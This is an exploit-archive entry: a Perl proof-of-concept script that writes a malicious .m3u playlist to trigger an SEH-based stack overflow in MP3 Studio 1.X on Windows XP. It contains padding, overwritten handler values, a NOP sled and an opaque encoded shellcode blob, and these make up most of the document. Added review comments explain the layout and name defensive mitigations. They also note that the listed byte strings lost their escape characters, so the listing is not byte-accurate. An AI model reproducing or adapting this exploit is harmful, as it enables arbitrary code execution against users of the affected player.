
# Title : MP3 Studio v1.X (.m3u File) Local Stack Overflow (Universal)
# Published : 2010-01-20
# Author : D3V!L FUCKER


#!/usr/bin/perl  

# Exploit Title: MP3 Studio v1.X (.m3u File) Local Stack Overflow  Universal 

# Date: 01/20/2010  

# Author: D3V!L FUCKER  

# Software Link: http://www.freewarezoom.com/archives/millennium-mp3-studio  

# Version: 1.X  

# Tested on: Windows XP SP2 , SP3


# Greetz [2] : THE INJECTIOR , sarbot511 , Thrid Devil , germaya_x , his0k4

# www.v99x.com <<< W3 M!ss y0u :( 
   

# Proof-of-concept generator: concatenates five strings and writes them as a
# single playlist entry to 4bdull4h.m3u in the current directory. Per the
# script header it concerns the .m3u handling of MP3 Studio 1.X, tested on
# Windows XP SP2/SP3. The title calls the flaw a stack overflow; the variable
# names below indicate that the structure being overwritten is a structured
# exception handler (SEH) record.
#
# NOTE(review): as rendered on this page the hex escapes carry no escape
# character, so every string below is plain ASCII text (for example the three
# characters "x41"), not single bytes. The listing is therefore not a
# byte-accurate copy of whatever was originally published.
#
# Defensive reading: the artifact to look for is a playlist entry that is
# thousands of characters long with no line break and is followed by non-text
# data; a legitimate .m3u entry is a path or URL. Handler-pointer validation
# (SafeSEH on the loaded modules, SEHOP where the OS provides it) is the class
# of mitigation aimed at this overwrite pattern. The underlying fix belongs in
# the player: presumably a length check on each playlist line before it is
# copied -- the page does not show the vulnerable code.
#
# The script runs without strict/warnings, so all variables are package globals.

# URL-style prefix followed by a pad repeated 4103 times ('x' binds tighter
# than '.', so only the pad is repeated). The count is presumably the distance
# to the overwritten record on the tested builds -- the page does not explain it.
$buff = "http://"."x41" x 4103; 
# Two 4-byte fields written back to back after the filler.
# NOTE(review): the names look swapped relative to the layout of an SEH record,
# where the next-record pointer precedes the handler pointer; the second value
# reads like a little-endian address (0x1002065B), presumably inside a module
# the player loads -- the page does not name it.
$SEH = "xebx1bx90x90"; 
$NEX_SEH = "x5Bx06x02x10";   
# Pad of 22 repeats placed between the two fields above and the payload
# (0x90 is the x86 NOP opcode).
$nob = "x90" x 22;
# Opaque payload blob, appended last. The page does not say what it does when
# executed; treat it as untrusted and do not infer behaviour from the listing.
$sc =  
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".  
"x49x49x49x49x49x49x49x49x49x49x49x51x48x5ax6ax47".  
"x58x30x42x31x50x42x41x6bx42x41x57x42x32x42x41x32".  
"x41x41x30x41x41x58x50x38x42x42x75x78x69x6bx4cx6a".  
"x48x53x74x67x70x67x70x75x50x4ex6bx53x75x65x6cx6e".  
"x6bx51x6cx46x65x70x78x43x31x68x6fx4ex6bx30x4fx54".  
"x58x6ex6bx73x6fx57x50x67x71x58x6bx77x39x4cx4bx64".  
"x74x6cx4bx57x71x5ax4ex76x51x49x50x6ex79x6ex4cx4f".  
"x74x4bx70x70x74x37x77x69x51x48x4ax64x4dx43x31x4f".  
"x32x7ax4bx48x74x55x6bx72x74x34x64x77x74x70x75x4d".  
"x35x6cx4bx71x4fx75x74x36x61x48x6bx41x76x4cx4bx44".  
"x4cx70x4bx4ex6bx63x6fx55x4cx33x31x68x6bx4ex6bx35".  
"x4cx4ex6bx34x41x6ax4bx6cx49x33x6cx35x74x64x44x4a".  
"x63x34x71x4bx70x63x54x6ex6bx71x50x76x50x4fx75x4b".  
"x70x72x58x74x4cx4cx4bx77x30x76x6cx4cx4bx44x30x57".  
"x6cx6cx6dx6ex6bx75x38x54x48x58x6bx73x39x6ex6bx4b".  
"x30x4ex50x37x70x67x70x37x70x6cx4bx62x48x45x6cx63".  
"x6fx35x61x39x66x35x30x50x56x4dx59x48x78x6ex63x59".  
"x50x43x4bx66x30x43x58x68x70x6fx7ax43x34x33x6fx73".  
"x58x4fx68x6bx4ex6dx5ax46x6ex72x77x6bx4fx78x67x63".  
"x53x62x41x30x6cx55x33x64x6ex42x45x70x78x32x45x33".  
"x30x47";  
# Two-argument open on a bareword handle in append mode ('>>'). The result is
# not checked, so a failed open goes unnoticed, and a second run appends
# another copy to the same file instead of replacing it.
open(myfile,'>>4bdull4h.m3u');  
# Write order: filler, the two 4-byte fields, the pad, then the payload,
# emitted as one run with no trailing newline.
print myfile $buff.$SEH.$NEX_SEH.$nob.$sc;  
close(myfile);